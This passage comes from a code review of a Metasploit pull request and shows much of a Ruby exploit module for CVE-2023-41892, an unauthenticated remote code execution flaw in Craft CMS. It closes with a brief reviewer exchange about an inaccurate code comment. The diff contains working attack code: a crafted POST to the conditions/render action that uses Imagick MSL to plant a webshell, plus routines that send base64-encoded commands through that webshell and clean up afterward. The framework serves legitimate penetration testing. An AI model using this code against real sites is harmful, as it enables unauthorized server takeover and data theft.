modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb

```diff
@@ -0,0 +1,289 @@
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(datastore['TARGETURI']),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'vars_post' => {
+          'action' => 'conditions/render',
+          'configObject[class]' => 'craft\elements\conditions\ElementCondition',
+          'config' => "{\"name\":\"configObject\",\"as \":{\"class\":\"Imagick\", \"__construct()\":{\"files\":\"vid:msl:#{@config['upload_tmp_dir']}/php*\"}}}"
+        }
+      })
+      # code 502 indicates a successful generation of the webshell in DOCUMENT_ROOT
+      return true if res && res.code == 502
+    end
+    false
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    php_cmd_function = datastore['COMMAND']
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        @get_param => php_cmd_function
+      },
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def on_new_session(session)
+    # cleanup webshell in DOCUMENT_ROOT
+    register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")
+
+    # Imagick plugin generates a php<random chars> file with MSL code in the directory set by
+    # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.
+    # A manual cleanup procedure is required to identify and remove the php* files when the session is established.
+    if session.type == 'meterpreter'
+      session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)
+      clean_files = session.fs.dir.entries
+      unless clean_files.nil? || clean_files.empty?
+        clean_files.each do |f|
+          register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/php+/)
+        end
+      end
+    else
+      clean_files = session.shell_command_token("ls #{@config['upload_tmp_dir']}/php*")
+      unless clean_files.nil? || clean_files.empty?
+        clean_files.split(' ').each do |f|
+          register_files_for_cleanup(f.to_s)
+        end
+      end
+    end
+    super
+  end
+
+  def check
+    check_phpinfo
+    return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    # check if upload_tmp_dir and document_root is already set from the check method otherwise try to get this info.
+    check_phpinfo unless datastore['AutoCheck']
```

Comment:
It looks like the comment says something different than what it is doing. Would it make more sense to check `@config['upload_tmp_dir']` and `@config['document_root']` instead, as you mentioned in the comment?

Reply:
I changed the comment. See https://github.com/rapid7/metasploit-framework/pull/18612/commits/db099f8f4ce235dc253cc015baf6d114717909ca.